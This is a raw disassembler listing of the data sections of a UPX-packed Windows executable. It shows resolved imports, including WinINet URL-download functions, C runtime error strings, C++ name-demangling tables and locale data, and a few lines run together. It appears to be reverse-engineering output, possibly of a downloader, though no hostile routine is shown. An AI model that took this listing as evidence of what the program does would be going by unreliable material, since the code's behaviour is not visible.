dword_40C0E8 dd 7C809915h ; resolved to->KERNEL32.GetACPdword_40C0EC dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_40C0F0 dd 7C8110CBh ; resolved to->KERNEL32.IsValidCodePagedword_40C0F4 dd 7C809A51h ; resolved to->KERNEL32.VirtualAlloc ; sub_40893C+52�r
dword_40C0F8 dd 7C9179FDh ; resolved to->NTDLL.RtlReAllocateHeap ; sub_40928C+134�r ...
dword_40C0FC dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_40C100 dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_40C104 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_40C108 dd 7C838A0Ch ; resolved to->KERNEL32.GetStringTypeAdword_40C10C dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChar ; sub_40A460:loc_40A50D�r ...
dword_40C110 dd 7C80A490h ; resolved to->KERNEL32.GetStringTypeW ; sub_40A226+11C�r
dword_40C114 dd 7C838DE8h ; resolved to->KERNEL32.LCMapStringA ; sub_40A460+365�r
dword_40C118 dd 7C80CCA8h ; resolved to->KERNEL32.LCMapStringW ; sub_40A460+144�r ...
align 10h
dword_40C120 dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandle ; UPX0:00401BF4�r ...
dword_40C124 dd 42C2C8A1h ; resolved to->WININET.InternetOpenAdword_40C128 dd 42C2ABF4h ; resolved to->WININET.InternetReadFiledword_40C12C dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA dd 0
dword_40C134 dd 0 dd offset sub_40B15F
dword_40C13C dd 0 dword_40C140 dd 0 dd offset sub_402622
dd offset sub_404CCA
dd offset sub_40842A
dd offset sub_4084F8
dd offset sub_405F15
dword_40C158 dd 0 dword_40C15C dd 0 dword_40C160 dd 0 dword_40C164 dd 0 dword_40C168 dd 2 dup(0) dd offset dword_40DCCC
off_40C174 dd offset loc_4012AE ; DATA XREF: sub_4012A3�o
; UPX0:004012B1�o ...
dd offset sub_4024C5
dd offset dword_40DC80
off_40C180 dd offset loc_401331 ; DATA XREF: sub_4012D1+20�o
; sub_401306+A�o ...
dd offset sub_401323
dd offset dword_40DC30
off_40C18C dd offset loc_401358 ; DATA XREF: UPX0:loc_40134D�o
; UPX0:0040135B�o ...
dd offset sub_401323
dd offset dword_40DB38
off_40C198 dd offset loc_401FD3 ; DATA XREF: sub_401FC8�o
; UPX0:00401FD6�o ...
dd offset sub_401323
aStringTooLong db 'string too long',0 ; DATA XREF: sub_401FF5+C�o
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_402034+C�o
dd offset dword_40DB88
off_40C1CC dd offset loc_4024D2 ; DATA XREF: sub_4023E0+A�o
; sub_4023F1+9�o ...
dd offset sub_4024C5
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: sub_4024C5+7�o
align 4
dd offset dword_40DB9C
off_40C1EC dd offset loc_402794 ; DATA XREF: sub_402786+1�o
; UPX1:off_40F004�o ...
dword_40C1F0 dd 0E06D7363h, 1, 2 dup(0) dd 3, 19930520h, 2 dup(0)
dword_40C210 dd 78696D2Eh, 747263haEncodepointer db 'EncodePointer',0 ; DATA XREF: sub_404694+4E�o
; sub_4047F1+37�o
align 4
aKernel32_dll db 'KERNEL32.DLL',0 ; DATA XREF: sub_404694:loc_4046C8�o
; sub_40470B:loc_40473F�o ...
align 4
aDecodepointer db 'DecodePointer',0 ; DATA XREF: sub_40470B+4E�o
; sub_4047F1+4D�o
align 4
aFlsfree db 'FlsFree',0 ; DATA XREF: sub_404A60+44�o
aFlssetvalue db 'FlsSetValue',0 ; DATA XREF: sub_404A60+37�o
aFlsgetvalue db 'FlsGetValue',0 ; DATA XREF: sub_404A60+2A�o
aFlsalloc db 'FlsAlloc',0 ; DATA XREF: sub_404A60+22�o
align 4
off_40C274 dd offset dword_40FE30 ; DATA XREF: sub_404CDE+D4�o
dd offset dword_40FE88
aCorexitprocess db 'CorExitProcess',0 ; DATA XREF: sub_40556D+F�o
align 4
aMscoree_dll db 'mscoree.dll',0 ; DATA XREF: sub_40556D�o
aRuntimeError db 'runtime error ',0
align 4
db 0Dh,0Ah,0
align 4
aTlossError db 'TLOSS error',0Dh,0Ah,0
align 4
aSingError db 'SING error',0Dh,0Ah,0
align 4
aDomainError db 'DOMAIN error',0Dh,0Ah,0
align 10h
aR6034AnApplica db 'R6034',0Dh,0Ah
db 'An application has made an attempt to load the C runtime library '
db 'incorrectly.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6033AttemptTo db 'R6033',0Dh,0Ah
db '- Attempt to use MSIL code from this assembly during native code '
db 'initialization',0Ah
db 'This indicates a bug in your application. It is most likely the r'
db 'esult of calling an MSIL-compiled (/clr) function from a native c'
db 'onstructor or from DllMain.',0Dh,0Ah,0
align 4
aR6032NotEnough db 'R6032',0Dh,0Ah
db '- not enough space for locale information',0Dh,0Ah,0
align 10h
aR6031AttemptTo db 'R6031',0Dh,0Ah
db '- Attempt to initialize the CRT more than once.',0Ah
db 'This indicates a bug in your application.',0Dh,0Ah,0
align 4
aR6030CrtNotIni db 'R6030',0Dh,0Ah
db '- CRT not initialized',0Dh,0Ah,0
align 4
aR6028UnableToI db 'R6028',0Dh,0Ah
db '- unable to initialize heap',0Dh,0Ah,0
align 4
aR6027NotEnough db 'R6027',0Dh,0Ah
db '- not enough space for lowio initialization',0Dh,0Ah,0
align 4
aR6026NotEnough db 'R6026',0Dh,0Ah
db '- not enough space for stdio initialization',0Dh,0Ah,0
align 4
aR6025PureVirtu db 'R6025',0Dh,0Ah
db '- pure virtual function call',0Dh,0Ah,0
align 4
aR6024NotEnough db 'R6024',0Dh,0Ah
db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
align 4
aR6019UnableToO db 'R6019',0Dh,0Ah
db '- unable to open console device',0Dh,0Ah,0
align 4
aR6018Unexpecte db 'R6018',0Dh,0Ah
db '- unexpected heap error',0Dh,0Ah,0
align 4
aR6017Unexpecte db 'R6017',0Dh,0Ah
db '- unexpected multithread lock error',0Dh,0Ah,0
align 4
aR6016NotEnough db 'R6016',0Dh,0Ah
db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio db 0Dh,0Ah
db 'This application has requested the Runtime to terminate it in an '
db 'unusual way.',0Ah
db 'Please contact the application',27h,'s support team for more informa'
db 'tion.',0Dh,0Ah,0
align 10h
aR6009NotEnough db 'R6009',0Dh,0Ah
db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough db 'R6008',0Dh,0Ah
db '- not enough space for arguments',0Dh,0Ah,0
align 4
aR6002FloatingP db 'R6002',0Dh,0Ah ; DATA XREF: UPX1:off_40F204�o
db '- floating point support not loaded',0Dh,0Ah,0
align 4
aMicrosoftVisua db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_405F23+157�o
align 10h
asc_40C820 db 0Ah ; DATA XREF: sub_405F23:loc_406033�o
db 0Ah,0
align 4
a___ db '...',0 ; DATA XREF: sub_405F23+E8�o
aProgramNameUnk db '<program name unknown>',0 ; DATA XREF: sub_405F23+A3�o
align 10h
aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: sub_405F23+5B�o
db 0Ah
db 'Program: ',0
align 4
off_40C85C dd offset sub_406CDC ; DATA XREF: sub_4058D0+F1�r
; sub_4058D0+FA�o ...
dd offset dword_40DBE4
off_40C864 dd offset loc_406AF4 ; DATA XREF: UPX0:00406AE9�o
; UPX0:00406AF7�o ...
dd offset sub_4024C5
dword_40C86C dd 20646162h, 65637865h, 6F697470h, 6Eh, 0dword_40C880 dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
dd 7C7B7A79h, 7F7E7Dh, 3Dh
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_409843+53�o
align 4
aKernel32_dll_0 db 'kernel32.dll',0 ; DATA XREF: sub_409843+44�o
align 4
aCompleteObject db ' Complete Object Locator',27h,0 ; DATA XREF: UPX0:0040CF14�o
align 4
aClassHierarchy db ' Class Hierarchy Descriptor',27h,0 ; DATA XREF: UPX0:0040CF10�o
align 4
aBaseClassArray db ' Base Class Array',27h,0 ; DATA XREF: UPX0:0040CF0C�o
align 4
aBaseClassDescr db ' Base Class Descriptor at (',0 ; DATA XREF: UPX0:0040CF08�o
aTypeDescriptor db ' Type Descriptor',27h,0 ; DATA XREF: UPX0:0040CF04�o
align 4
aLocalStaticThr db '`local static thread guard',27h,0 ; DATA XREF: UPX1:0040D050�o
aManagedVectorC db '`managed vector copy constructor iterator',27h,0
; DATA XREF: UPX1:0040D04C�o
align 4
aVectorVbaseCop db '`vector vbase copy constructor iterator',27h,0
; DATA XREF: UPX1:0040D048�o
align 10h
aVectorCopyCons db '`vector copy constructor iterator',27h,0
align 4
aDynamicAtexitD db '`dynamic atexit destructor for ',27h,0
align 4
aDynamicInitial db '`dynamic initializer for ',27h,0
align 4
aEhVectorVbaseC db '`eh vector vbase copy constructor iterator',27h,0
aEhVectorCopyCo db '`eh vector copy constructor iterator',27h,0
align 4
aManagedVectorD db '`managed vector destructor iterator',27h,0
align 10h
aManagedVecto_0 db '`managed vector constructor iterator',27h,0
align 4
aPlacementDelet db '`placement delete[] closure',27h,0
align 4
aPlacementDel_0 db '`placement delete closure',27h,0
align 4
aOmniCallsig db '`omni callsig',27h,0
align 4
aDelete db ' delete[]',0
align 10h
aNew db ' new[]',0
align 4
aLocalVftableCo db '`local vftable constructor closure',27h,0
aLocalVftable db '`local vftable',27h,0
aRtti db '`RTTI',0
align 4
aEh db '`EH',0
aUdtReturning db '`udt returning',27h,0
aCopyConstructo db '`copy constructor closure',27h,0 ; DATA XREF: UPX1:off_40D000�o
align 4
aEhVectorVbas_0 db '`eh vector vbase constructor iterator',27h,0 ; DATA XREF: UPX0:0040CFFC�o
align 4
aEhVectorDestru db '`eh vector destructor iterator',27h,0 ; DATA XREF: UPX0:0040CFF8�o
aEhVectorConstr db '`eh vector constructor iterator',27h,0 ; DATA XREF: UPX0:0040CFF4�o
align 10h
aVirtualDisplac db '`virtual displacement map',27h,0 ; DATA XREF: UPX0:0040CFF0�o
align 4
aVectorVbaseCon db '`vector vbase constructor iterator',27h,0 ; DATA XREF: UPX0:0040CFEC�o
aVectorDestruct db '`vector destructor iterator',27h,0 ; DATA XREF: UPX0:0040CFE8�o
align 10h
aVectorConstruc db '`vector constructor iterator',27h,0 ; DATA XREF: UPX0:0040CFE4�o
align 10h
aScalarDeleting db '`scalar deleting destructor',27h,0 ; DATA XREF: UPX0:0040CFE0�o
align 10h
aDefaultConstru db '`default constructor closure',27h,0 ; DATA XREF: UPX0:0040CFDC�o
align 10h
aVectorDeleting db '`vector deleting destructor',27h,0 ; DATA XREF: UPX0:0040CFD8�o
align 10h
aVbaseDestructo db '`vbase destructor',27h,0 ; DATA XREF: UPX0:0040CFD4�o
align 4
aString db '`string',27h,0 ; DATA XREF: UPX0:0040CFD0�o
align 10h
aLocalStaticGua db '`local static guard',27h,0 ; DATA XREF: UPX0:0040CFCC�o
align 4
aTypeof db '`typeof',27h,0 ; DATA XREF: UPX0:0040CFC8�o
align 4
aVcall db '`vcall',27h,0 ; DATA XREF: UPX0:0040CFC4�o
aVbtable db '`vbtable',27h,0 ; DATA XREF: UPX0:0040CFC0�o
align 4
aVftable db '`vftable',27h,0 ; DATA XREF: UPX0:0040CFBC�o
align 4
asc_40CDB4 db '^=',0 ; DATA XREF: UPX0:0040CFB8�o
align 4
asc_40CDB8 db '|=',0 ; DATA XREF: UPX0:0040CFB4�o
align 4
asc_40CDBC db '&=',0 ; DATA XREF: UPX0:0040CFB0�o
align 10h
asc_40CDC0 db '<<=',0 ; DATA XREF: UPX0:0040CFAC�o
asc_40CDC4 db '>>=',0 ; DATA XREF: UPX0:0040CFA8�o
asc_40CDC8 db '%=',0 ; DATA XREF: UPX0:0040CFA4�o
align 4
asc_40CDCC db '/=',0 ; DATA XREF: UPX0:0040CFA0�o
align 10h
asc_40CDD0 db '-=',0 ; DATA XREF: UPX0:0040CF9C�o
align 4
asc_40CDD4 db '+=',0 ; DATA XREF: UPX0:0040CF98�o
align 4
asc_40CDD8 db '*=',0 ; DATA XREF: UPX0:0040CF94�o
align 4
asc_40CDDC db '||',0 ; DATA XREF: UPX0:0040CF90�o
align 10h
asc_40CDE0 db '&&',0 ; DATA XREF: UPX0:0040CF8C�o
align 4
asc_40CDE4: ; DATA XREF: UPX0:0040CF88�o
unicode 0, <|>,0
asc_40CDE8: ; DATA XREF: UPX0:0040CF84�o
unicode 0, <^>,0
asc_40CDEC: ; DATA XREF: UPX0:0040CF80�o
unicode 0, <~>,0
asc_40CDF0 db '()',0 ; DATA XREF: UPX0:0040CF7C�o
align 4
asc_40CDF4: ; DATA XREF: UPX0:0040CF78�o
unicode 0, <,>,0
asc_40CDF8 db '>=',0 ; DATA XREF: UPX0:0040CF74�o
align 4
asc_40CDFC: ; DATA XREF: UPX0:0040CF70�o
dw 3Eh
unicode 0, <>,0
asc_40CE00 db '<=',0 ; DATA XREF: UPX0:0040CF6C�o
align 4
asc_40CE04: ; DATA XREF: UPX0:0040CF68�o
dw 3Ch
unicode 0, <>,0
asc_40CE08: ; DATA XREF: UPX0:0040CF64�o
unicode 0, <%>,0
asc_40CE0C: ; DATA XREF: UPX0:0040CF60�o
unicode 0, </>,0
asc_40CE10 db '->*',0 ; DATA XREF: UPX0:0040CF5C�o
asc_40CE14: ; DATA XREF: UPX0:0040CF58�o
unicode 0, <&>,0
asc_40CE18: ; DATA XREF: UPX0:0040CF54�o
unicode 0, <+>,0
asc_40CE1C: ; DATA XREF: UPX0:0040CF50�o
unicode 0, <->,0
asc_40CE20 db '--',0 ; DATA XREF: UPX0:0040CF4C�o
align 4
asc_40CE24 db '++',0 ; DATA XREF: UPX0:0040CF48�o
align 4
asc_40CE28: ; DATA XREF: UPX0:0040CF44�o
unicode 0, <*>,0
asc_40CE2C db '->',0 ; DATA XREF: UPX0:0040CF40�o
align 10h
aOperator db 'operator',0 ; DATA XREF: UPX0:0040CF3C�o
align 4
asc_40CE3C db '[]',0 ; DATA XREF: UPX0:0040CF38�o
align 10h
asc_40CE40 db '!=',0 ; DATA XREF: UPX0:0040CF34�o
align 4
asc_40CE44 db '==',0 ; DATA XREF: UPX0:0040CF30�o
align 4
asc_40CE48: ; DATA XREF: UPX0:0040CF2C�o
unicode 0, <!>,0
asc_40CE4C db '<<',0 ; DATA XREF: UPX0:0040CF28�o
align 10h
asc_40CE50 db '>>',0 ; DATA XREF: UPX0:0040CF24�o
align 4
aDelete_0 db ' delete',0 ; DATA XREF: UPX0:0040CF1C�o
aNew_0 db ' new',0 ; DATA XREF: UPX0:0040CF18�o
align 4
a__unaligned db '__unaligned',0 ; DATA XREF: UPX0:0040CEFC�o
a__restrict db '__restrict',0 ; DATA XREF: UPX0:0040CEF8�o
align 4
; a__ptr64
a__ptr64 db '__ptr64',0 ; DATA XREF: UPX0:0040CEF4�o
a__clrcall db '__clrcall',0 ; DATA XREF: UPX0:0040CEF0�o
align 10h
a__fastcall db '__fastcall',0 ; DATA XREF: UPX0:0040CEEC�o
align 4
a__thiscall db '__thiscall',0 ; DATA XREF: UPX0:0040CEE8�o
align 4
a__stdcall db '__stdcall',0 ; DATA XREF: UPX0:0040CEE4�o
align 4
a__pascal db '__pascal',0 ; DATA XREF: UPX0:0040CEE0�o
align 10h
a__cdecl db '__cdecl',0 ; DATA XREF: UPX0:0040CEDC�o
a__based db '__based(',0 ; DATA XREF: UPX0:0040CED8�o
align 8
dd offset a__based ; "__based("
dd offset a__cdecl ; "__cdecl"
dd offset a__pascal ; "__pascal"
dd offset a__stdcall ; "__stdcall"
dd offset a__thiscall ; "__thiscall"
dd offset a__fastcall ; "__fastcall"
dd offset a__clrcall ; "__clrcall"
dd offset a__ptr64 ; "__ptr64"
dd offset a__restrict ; "__restrict"
dd offset a__unaligned ; "__unaligned"
dd offset byte_40DA4F
dd offset aTypeDescriptor ; " Type Descriptor'"
dd offset aBaseClassDescr ; " Base Class Descriptor at ("
dd offset aBaseClassArray ; " Base Class Array'"
dd offset aClassHierarchy ; " Class Hierarchy Descriptor'"
dd offset aCompleteObject ; " Complete Object Locator'"
dd offset aNew_0 ; " new"
dd offset aDelete_0 ; " delete"
dd offset dword_40C880+80h
dd offset asc_40CE50 ; ">>"
dd offset asc_40CE4C ; "<<"
dd offset asc_40CE48 ; "!"
dd offset asc_40CE44 ; "=="
dd offset asc_40CE40 ; "!="
dd offset asc_40CE3C ; "[]"
dd offset aOperator ; "operator"
dd offset asc_40CE2C ; "->"
dd offset asc_40CE28 ; "*"
dd offset asc_40CE24 ; "++"
dd offset asc_40CE20 ; "--"
dd offset asc_40CE1C ; "-"
dd offset asc_40CE18 ; "+"
dd offset asc_40CE14 ; "&"
dd offset asc_40CE10 ; "->*"
dd offset asc_40CE0C ; "/"
dd offset asc_40CE08 ; "%"
dd offset asc_40CE04 ; "<"
dd offset asc_40CE00 ; "<="
dd offset asc_40CDFC ; ">"
dd offset asc_40CDF8 ; ">="
dd offset asc_40CDF4 ; ","
dd offset asc_40CDF0 ; "()"
dd offset asc_40CDEC ; "~"
dd offset asc_40CDE8 ; "^"
dd offset asc_40CDE4 ; "|"
dd offset asc_40CDE0 ; "&&"
dd offset asc_40CDDC ; "||"
dd offset asc_40CDD8 ; "*="
dd offset asc_40CDD4 ; "+="
dd offset asc_40CDD0 ; "-="
dd offset asc_40CDCC ; "/="
dd offset asc_40CDC8 ; "%="
dd offset asc_40CDC4 ; ">>="
dd offset asc_40CDC0 ; "<<="
dd offset asc_40CDBC ; "&="
dd offset asc_40CDB8 ; "|="
dd offset asc_40CDB4 ; "^="
dd offset aVftable ; "`vftable'"
dd offset aVbtable ; "`vbtable'"
dd offset aVcall ; "`vcall'"
dd offset aTypeof ; "`typeof'"
dd offset aLocalStaticGua ; "`local static guard'"
dd offset aString ; "`string'"
dd offset aVbaseDestructo ; "`vbase destructor'"
dd offset aVectorDeleting ; "`vector deleting destructor'"
dd offset aDefaultConstru ; "`default constructor closure'"
dd offset aScalarDeleting ; "`scalar deleting destructor'"
dd offset aVectorConstruc ; "`vector constructor iterator'"
dd offset aVectorDestruct ; "`vector destructor iterator'"
dd offset aVectorVbaseCon ; "`vector vbase constructor iterator'"
dd offset aVirtualDisplac ; "`virtual displacement map'"
dd offset aEhVectorConstr ; "`eh vector constructor iterator'"
dd offset aEhVectorDestru ; "`eh vector destructor iterator'"
dd offset aEhVectorVbas_0 ; "`eh vector vbase constructor iterator'"
UPX0 ends
; Section 2. (virtual address 0000D000)
; Virtual size : 00007000 ( 28672.)
; Section size in file : 00007000 ( 28672.)
; Offset to raw data for section: 0000D000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 40D000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
off_40D000 dd offset aCopyConstructo ; DATA XREF: start+1�o
; "`copy constructor closure'"
; ---------------------------------------------------------------------------
fmul st, st(3)
inc eax
add ah, dl
retf
; ---------------------------------------------------------------------------
inc eax
add ah, cl
retf
; ---------------------------------------------------------------------------
inc eax
add [ebx+ecx*8-3467FFC0h], bh
inc eax
add [eax-7BFFBF35h], dl
retf
; ---------------------------------------------------------------------------
inc eax
add [ebx+ecx*8+40h], dh
add [eax-35h], bl
inc eax
add [eax], bh
retf
; ---------------------------------------------------------------------------
inc eax
add [eax], dl
retf
; ---------------------------------------------------------------------------
inc eax
add al, ch
retf 40h
; ---------------------------------------------------------------------------
ror dl, 40h
add [edx+ecx*8-3587FFC0h], dl
inc eax
add [edx+ecx*8+40h], dl
add [eax], dh
retf 40h
; ---------------------------------------------------------------------------
dd offset aVectorVbaseCop ; "`vector vbase copy constructor iterator"...
dd offset aManagedVectorC ; "`managed vector copy constructor iterat"...
dd offset aLocalStaticThr ; "`local static thread guard'"
dd offset byte_40DA4F
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_409A5B+C2�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_409A5B+AA�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_409A5B+6E�o
align 10h
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_409A5B+59�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_409A5B+43�o
aUser32_dll db 'USER32.DLL',0 ; DATA XREF: sub_409A5B+28�o
align 4
dd 40h dup(0)
asc_40D1C8: ; DATA XREF: UPX1:0040F598�o
; UPX1:0040FB14�o
unicode 0, < ((((( H>
dw 10h
dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
dd 100010h, 200010h, 40h dup(0)
dword_40D3C8 dd 200000h aHH: ; DATA XREF: UPX1:off_40F4C0�o
unicode 0, < h(((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(1810181h), 0Ah dup(1010101h), 3 dup(100010h)
dd 3 dup(1820182h), 0Ah dup(1020102h), 2 dup(100010h)
dd 10h dup(200020h), 480020h, 8 dup(100010h), 140010h
dd 100014h, 2 dup(100010h), 100014h, 2 dup(100010h), 1010010h
dd 0Bh dup(1010101h), 1010010h, 3 dup(1010101h), 0Ch dup(1020102h)
dd 1020010h, 3 dup(1020102h), 1010102h, 0
dword_40D5D0 dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h, 0B0A0908h
dd 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h, 1F1E1D1Ch
dd 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch, 33323130h
dd 37363534h, 3B3A3938h, 3F3E3D3Ch, 63626140h, 67666564h
dd 6B6A6968h, 6F6E6D6Ch, 73727170h, 77767574h, 5B7A7978h
dd 5F5E5D5Ch, 63626160h, 67666564h, 6B6A6968h, 6F6E6D6Ch
dd 73727170h, 77767574h, 7B7A7978h, 7F7E7D7Ch, 83828180h
dd 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h, 97969594h
dd 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h, 0ABAAA9A8h
dd 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h, 0BFBEBDBCh
dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
dd 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h, 0E7E6E5E4h
dd 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h, 0FBFAF9F8h
dd 0FFFEFDFCh, 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch
dd 93929190h, 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h
dd 0A7A6A5A4h, 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h
dd 0BBBAB9B8h, 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h
dd 0CFCECDCCh, 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F7F6F5F4h, 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h
dd 0B0A0908h, 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h
dd 1F1E1D1Ch, 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch
dd 33323130h, 37363534h, 3B3A3938h, 3F3E3D3Ch, 43424140h
dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h, 57565554h
dd 5B5A5958h, 5F5E5D5Ch, 43424160h, 47464544h, 4B4A4948h
dd 4F4E4D4Ch, 53525150h, 57565554h, 7B5A5958h, 7F7E7D7Ch
dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h
dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
dd 0FBFAF9F8h, 0FFFEFDFCh, 6D3A4848h, 73733A6Dh, 0
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: UPX1:0040FBC4�o
aMmDdYy db 'MM/dd/yy',0 ; DATA XREF: UPX1:0040FBC0�o
align 4
aPm db 'PM',0 ; DATA XREF: UPX1:0040FBBC�o
align 10h
aAm db 'AM',0 ; DATA XREF: UPX1:0040FBB8�o
align 4
aDecember db 'December',0 ; DATA XREF: UPX1:0040FBB4�o
align 10h
aNovember db 'November',0 ; DATA XREF: UPX1:0040FBB0�o
align 4
aOctober db 'October',0 ; DATA XREF: UPX1:0040FBAC�o
aSeptember db 'September',0 ; DATA XREF: UPX1:0040FBA8�o
align 10h
aAugust db 'August',0 ; DATA XREF: UPX1:0040FBA4�o
align 4
aJuly db 'July',0 ; DATA XREF: UPX1:0040FBA0�o
align 10h
aJune db 'June',0 ; DATA XREF: UPX1:0040FB9C�o
align 4
aApril db 'April',0 ; DATA XREF: UPX1:0040FB94�o
align 10h
aMarch db 'March',0 ; DATA XREF: UPX1:0040FB90�o
align 4
aFebruary db 'February',0 ; DATA XREF: UPX1:0040FB8C�o
align 4
aJanuary db 'January',0 ; DATA XREF: UPX1:0040FB88�o
aDec db 'Dec',0 ; DATA XREF: UPX1:0040FB84�o
aNov db 'Nov',0 ; DATA XREF: UPX1:0040FB80�o
aOct db 'Oct',0 ; DATA XREF: UPX1:0040FB7C�o
aSep db 'Sep',0 ; DATA XREF: UPX1:0040FB78�o
aAug db 'Aug',0 ; DATA XREF: UPX1:0040FB74�o
aJul db 'Jul',0 ; DATA XREF: UPX1:0040FB70�o
aJun db 'Jun',0 ; DATA XREF: UPX1:0040FB6C�o
aMay db 'May',0 ; DATA XREF: UPX1:0040FB68�o
; UPX1:0040FB98�o
aApr db 'Apr',0 ; DATA XREF: UPX1:0040FB64�o
aMar db 'Mar',0 ; DATA XREF: UPX1:0040FB60�o
aFeb db 'Feb',0 ; DATA XREF: UPX1:0040FB5C�o
aJan db 'Jan',0 ; DATA XREF: UPX1:0040FB58�o
aSaturday db 'Saturday',0 ; DATA XREF: UPX1:0040FB54�o
align 4
aFriday db 'Friday',0 ; DATA XREF: UPX1:0040FB50�o
align 10h
aThursday db 'Thursday',0 ; DATA XREF: UPX1:0040FB4C�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: UPX1:0040FB48�o
align 4
aTuesday db 'Tuesday',0 ; DATA XREF: UPX1:0040FB44�o
aMonday db 'Monday',0 ; DATA XREF: UPX1:0040FB40�o
align 4
aSunday db 'Sunday',0 ; DATA XREF: UPX1:0040FB3C�o
align 10h
aSat db 'Sat',0 ; DATA XREF: UPX1:0040FB38�o
aFri db 'Fri',0 ; DATA XREF: UPX1:0040FB34�o
aThu db 'Thu',0 ; DATA XREF: UPX1:0040FB30�o
aWed db 'Wed',0 ; DATA XREF: UPX1:0040FB2C�o
aTue db 'Tue',0 ; DATA XREF: UPX1:0040FB28�o
aMon db 'Mon',0 ; DATA XREF: UPX1:0040FB24�o
aSun db 'Sun',0 ; DATA XREF: UPX1:off_40FB20�o
dword_40D9FC dd 0 ; sub_40A460+25�o
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 10h
aBadAllocation db 'bad allocation',0 ; DATA XREF: UPX1:0040F000�o
; UPX1:off_40F030�o ...
byte_40DA4F db 0 ; DATA XREF: sub_4010EC+55�o
; sub_40625A+1B�o ...
